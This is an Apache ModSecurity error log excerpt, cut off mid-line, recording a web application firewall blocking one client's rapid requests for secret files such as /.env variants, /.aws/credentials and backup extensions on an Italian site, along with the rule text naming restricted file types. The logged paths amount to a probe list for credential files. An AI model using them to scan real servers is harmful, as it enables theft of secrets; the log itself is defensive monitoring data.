[Thu Nov 27 01:05:38.853312 2025] [:error] [pid 350838] [client 195.178.110.157:53880] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aSeV0lloYoeK3vI2n0LLKwAAAAg"]
[Thu Nov 27 01:05:38.853508 2025] [:error] [pid 350838] [client 195.178.110.157:53880] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aSeV0lloYoeK3vI2n0LLKwAAAAg"]
[Thu Nov 27 01:05:39.582093 2025] [:error] [pid 350838] [client 195.178.110.157:53880] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.example"] [unique_id "aSeV01loYoeK3vI2n0LLLAAAAAg"]
[Thu Nov 27 01:05:39.582330 2025] [:error] [pid 350838] [client 195.178.110.157:53880] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.example"] [unique_id "aSeV01loYoeK3vI2n0LLLAAAAAg"]
[Thu Nov 27 01:05:39.582566 2025] [:error] [pid 350838] [client 195.178.110.157:53880] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.example"] [unique_id "aSeV01loYoeK3vI2n0LLLAAAAAg"]
[Thu Nov 27 01:05:40.235305 2025] [:error] [pid 350838] [client 195.178.110.157:53880] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.stage"] [unique_id "aSeV1FloYoeK3vI2n0LLLQAAAAg"]
[Thu Nov 27 01:05:40.235549 2025] [:error] [pid 350838] [client 195.178.110.157:53880] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.stage"] [unique_id "aSeV1FloYoeK3vI2n0LLLQAAAAg"]
[Thu Nov 27 01:05:40.235761 2025] [:error] [pid 350838] [client 195.178.110.157:53880] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.stage"] [unique_id "aSeV1FloYoeK3vI2n0LLLQAAAAg"]
[Thu Nov 27 01:05:42.570109 2025] [:error] [pid 351651] [client 195.178.110.157:53888] [client 195.178.110.157] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.env.old"] [unique_id "aSeV1oxHByoaNs3XDjf6dAAAAAc"]
[Thu Nov 27 01:05:42.570258 2025] [:error] [pid 351651] [client 195.178.110.157:53888] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.old"] [unique_id "aSeV1oxHByoaNs3XDjf6dAAAAAc"]
[Thu Nov 27 01:05:42.570566 2025] [:error] [pid 351651] [client 195.178.110.157:53888] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.old"] [unique_id "aSeV1oxHByoaNs3XDjf6dAAAAAc"]
[Thu Nov 27 01:05:42.570773 2025] [:error] [pid 351651] [client 195.178.110.157:53888] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.old"] [unique_id "aSeV1oxHByoaNs3XDjf6dAAAAAc"]
[Thu Nov 27 01:05:43.359096 2025] [:error] [pid 351651] [client 195.178.110.157:53888] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env_sample"] [unique_id "aSeV14xHByoaNs3XDjf6dQAAAAc"]
[Thu Nov 27 01:05:43.359341 2025] [:error] [pid 351651] [client 195.178.110.157:53888] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env_sample"] [unique_id "aSeV14xHByoaNs3XDjf6dQAAAAc"]
[Thu Nov 27 01:05:43.359528 2025] [:error] [pid 351651] [client 195.178.110.157:53888] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env_sample"] [unique_id "aSeV14xHByoaNs3XDjf6dQAAAAc"]
[Thu Nov 27 01:05:44.803800 2025] [:error] [pid 351651] [client 195.178.110.157:53888] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "aSeV2IxHByoaNs3XDjf6dwAAAAc"]
[Thu Nov 27 01:05:44.804032 2025] [:error] [pid 351651] [client 195.178.110.157:53888] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "aSeV2IxHByoaNs3XDjf6dwAAAAc"]
[Thu Nov 27 01:05:44.804226 2025] [:error] [pid 351651] [client 195.178.110.157:53888] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "aSeV2IxHByoaNs3XDjf6dwAAAAc"]
[Thu Nov 27 01:05:45.344338 2025] [:error] [pid 351651] [client 195.178.110.157:53888] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/crm/.env"] [unique_id "aSeV2YxHByoaNs3XDjf6eAAAAAc"]
[Thu Nov 27 01:05:45.344648 2025] [:error] [pid 351651] [client 195.178.110.157:53888] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/crm/.env"] [unique_id "aSeV2YxHByoaNs3XDjf6eAAAAAc"]
[Thu Nov 27 01:05:45.344897 2025] [:error] [pid 351651] [client 195.178.110.157:53888] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/crm/.env"] [unique_id "aSeV2YxHByoaNs3XDjf6eAAAAAc"]
[Thu Nov 27 01:05:46.125887 2025] [:error] [pid 351651] [client 195.178.110.157:53888] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/local/.env"] [unique_id "aSeV2oxHByoaNs3XDjf6eQAAAAc"]
[Thu Nov 27 01:05:46.126119 2025] [:error] [pid 351651] [client 195.178.110.157:53888] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/local/.env"] [unique_id "aSeV2oxHByoaNs3XDjf6eQAAAAc"]
[Thu Nov 27 01:05:46.126363 2025] [:error] [pid 351651] [client 195.178.110.157:53888] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/local/.env"] [unique_id "aSeV2oxHByoaNs3XDjf6eQAAAAc"]
[Thu Nov 27 01:05:46.645752 2025] [:error] [pid 351651] [client 195.178.110.157:53888] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aSeV2oxHByoaNs3XDjf6egAAAAc"]
[Thu Nov 27 01:05:46.646084 2025] [:error] [pid 351651] [client 195.178.110.157:53888] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aSeV2oxHByoaNs3XDjf6egAAAAc"]
[Thu Nov 27 01:05:46.646394 2025] [:error] [pid 351651] [client 195.178.110.157:53888] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aSeV2oxHByoaNs3XDjf6egAAAAc"]
[Thu Nov 27 01:05:47.384201 2025] [:error] [pid 351651] [client 195.178.110.157:53888] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/apps/.env"] [unique_id "aSeV24xHByoaNs3XDjf6ewAAAAc"]
[Thu Nov 27 01:05:47.384442 2025] [:error] [pid 351651] [client 195.178.110.157:53888] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/apps/.env"] [unique_id "aSeV24xHByoaNs3XDjf6ewAAAAc"]
[Thu Nov 27 01:05:47.384638 2025] [:error] [pid 351651] [client 195.178.110.157:53888] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/apps/.env"] [unique_id "aSeV24xHByoaNs3XDjf6ewAAAAc"]
[Thu Nov 27 01:05:48.038615 2025] [:error] [pid 351651] [client 195.178.110.157:53888] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "aSeV3IxHByoaNs3XDjf6fAAAAAc"]
[Thu Nov 27 01:05:48.038853 2025] [:error] [pid 351651] [client 195.178.110.157:53888] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "aSeV3IxHByoaNs3XDjf6fAAAAAc"]
[Thu Nov 27 01:05:48.039048 2025] [:error] [pid 351651] [client 195.178.110.157:53888] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "aSeV3IxHByoaNs3XDjf6fAAAAAc"]
[Thu Nov 27 01:05:48.541279 2025] [:error] [pid 351651] [client 195.178.110.157:53888] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/web/.env"] [unique_id "aSeV3IxHByoaNs3XDjf6fQAAAAc"]
[Thu Nov 27 01:05:48.541513 2025] [:error] [pid 351651] [client 195.178.110.157:53888] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/web/.env"] [unique_id "aSeV3IxHByoaNs3XDjf6fQAAAAc"]
[Thu Nov 27 01:05:48.541720 2025] [:error] [pid 351651] [client 195.178.110.157:53888] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/web/.env"] [unique_id "aSeV3IxHByoaNs3XDjf6fQAAAAc"]
[Thu Nov 27 01:05:49.353334 2025] [:error] [pid 351651] [client 195.178.110.157:53888] [client 195.178.110.157] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "aSeV3YxHByoaNs3XDjf6fgAAAAc"]
[Thu Nov 27 01:05:49.353567 2025] [:error] [pid 351651] [client 195.178.110.157:53888] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "aSeV3YxHByoaNs3XDjf6fgAAAAc"]
[Thu Nov 27 01:05:49.353757 2025] [:error] [pid 351651] [client 195.178.110.157:53888] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "aSeV3YxHByoaNs3XDjf6fgAAAAc"]
[Thu Nov 27 01:05:49.885690 2025] [:error] [pid 351651] [client 195.178.110.157:53888] [client 195.178.110.157] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname 